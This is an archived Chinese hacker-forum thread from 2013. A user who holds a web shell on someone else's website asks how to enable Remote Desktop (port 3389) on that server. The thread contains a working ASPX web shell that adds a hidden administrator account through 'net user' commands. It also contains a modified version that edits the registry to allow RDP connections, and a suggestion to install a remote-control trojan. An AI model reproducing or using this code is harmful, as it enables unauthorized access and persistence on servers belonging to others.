开3389问题

635634436 发表于 2013-1-9 16:25:58

是这样，
我拿到一个网站的shell组建不支持也就不能执行命令了，
但是我用一个，
<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false"%>
<%@ import Namespace="System.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<%@ import Namespace="System.Data" %>
<%@ import Namespace="System.Data.OleDb" %>
<%@ import Namespace="Microsoft.Win32" %>
<%@ import Namespace="System.Net.Sockets" %>
<%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %>
<%@ import Namespace="System.DirectoryServices" %>
<%
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.
RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath("gui.exe");
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments= " \"net user admin hei /add & net localgroup administrators admin /add\" ";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
%>
在网上下载的 aspx文件还有一gui.exe文件配合起来创建了帐号. 当然了，这个代码我看不懂.
可是服务器没有开3389.我想能不能写一个开3389的ASPX文件配合一个开3389的exe文件。
求大神帮帮忙！

made 发表于 2013-1-9 20:48:45

导注册表

Free_小东 发表于 2013-1-9 23:12:54

myP.StartInfo.Arguments= " \"REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f\" ";
测试是否可行

635634436 发表于 2013-1-9 23:37:29

Free_小东发表于 2013-1-9 23:12 static/image/common/back.gif
myP.StartInfo.Arguments= " \"REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDen ...

直接保存为aspx文件访问么？

Free_小东 发表于 2013-1-10 12:09:53

635634436 发表于 2013-1-9 23:37 static/image/common/back.gif
直接保存为aspx文件访问么？

把上面的这段代码改成我的这段代码试试

635634436 发表于 2013-1-10 13:26:23

Free_小东发表于 2013-1-10 12:09 static/image/common/back.gif
把上面的这段代码改成我的这段代码试试

不明白你的意思=... 说全面一点吧！

Free_小东 发表于 2013-1-10 13:45:46

<%@ Page Language="C#" Debug="true" trace="false" validateRequest="false"%>
<%@ import Namespace="System.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<%@ import Namespace="System.Data" %>
<%@ import Namespace="System.Data.OleDb" %>
<%@ import Namespace="Microsoft.Win32" %>
<%@ import Namespace="System.Net.Sockets" %>
<%@ Assembly Name="System.DirectoryServices, Version=2.0.0.0, Culture=neutral, PublicKeyToken=B03F5F7F11D50A3A" %>
<%@ import Namespace="System.DirectoryServices" %>
<%
System.Diagnostics.Process myP = new System.Diagnostics.Process();
myP.StartInfo.
RedirectStandardOutput = true;
myP.StartInfo.FileName=Server.MapPath("gui.exe");
myP.StartInfo.UseShellExecute = false;
myP.StartInfo.Arguments= " \"REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f\" ";
myP.Start();
string output = myP.StandardOutput.ReadToEnd();
Response.Write(output);
%>

635634436 发表于 2013-1-10 14:20:31

Free_小东发表于 2013-1-10 13:45 static/image/common/back.gif

我想你理解错啦，这个东西还配有一个gui.exe文件，我用了后不是创建的admin账户是gui账户http://www.szjimco.com/images/2.jpg
也就是说那里的命令是没用的。是gui.exe创建的账户。
你把文件下下去看看吧，

Free_小东 发表于 2013-1-10 21:25:58

635634436 发表于 2013-1-10 14:20 static/image/common/back.gif
我想你理解错啦，这个东西还配有一个gui.exe文件，我用了后不是创建的admin账户是gui账户
也就是说那里 ...

既然能执行exe 文件，远控搞定呗

635634436 发表于 2013-1-10 21:35:05

Free_小东发表于 2013-1-10 21:25 static/image/common/back.gif
既然能执行exe 文件，远控搞定呗

如果能执行就好了- - 不能执行的。他是配合在一起用的。我也不怎么清楚。你把附件拿下去看一下吧

页: [1] 2

红客联盟 - 由08安全团队运营's Archiver

开3389问题